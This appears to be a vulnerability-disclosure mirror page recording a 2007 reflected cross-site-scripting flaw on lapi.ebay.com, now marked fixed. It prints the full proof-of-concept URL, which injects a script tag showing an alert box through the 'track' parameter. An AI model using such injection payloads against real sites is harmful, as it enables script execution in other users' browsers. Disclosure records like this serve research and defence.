lapi.ebay.com cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher Nemessis, has submitted on 22/05/2007 a cross-site-scripting (XSS) vulnerability affecting lapi.ebay.com, which at the time of submission ranked 16 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2007. It is currently fixed.

Date submitted: 22/05/2007

Date published: 22/05/2007

Date fixed: 01/11/2007

Status:

FIXED

Author: Nemessis

Domain: lapi.ebay.com

Category: XSS

Pagerank: 16

URL: http://lapi.ebay.com/ws/eBayISAPI.dll?CAServer&Accepts=n&adType=1&bgColor=FEF0CE&bin=n&bodyFont=1&bo
rderColor=F8B20C&catid=&charity=n&charityid=&content=1&encode=ISO-8859-1&few=&gallery=y&linkColor=00
3366&logo=n&maxprice=&minprice=&priceColor=990000&prvd=1&r0=1&sacategoryex=&sacategoryin=&sellerid=&
sid=eBayAdContext897507&siteid=0&size=14&sort=0&sortby=endtime&sortdir=asc&srchdesc=n&ssPageName=eBa
y_ads&testFlash=y&textColor=333333&theme=0&titleandprice=n&track="><script>alert('Nemessis-www.rstzo
ne.net')</script>

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention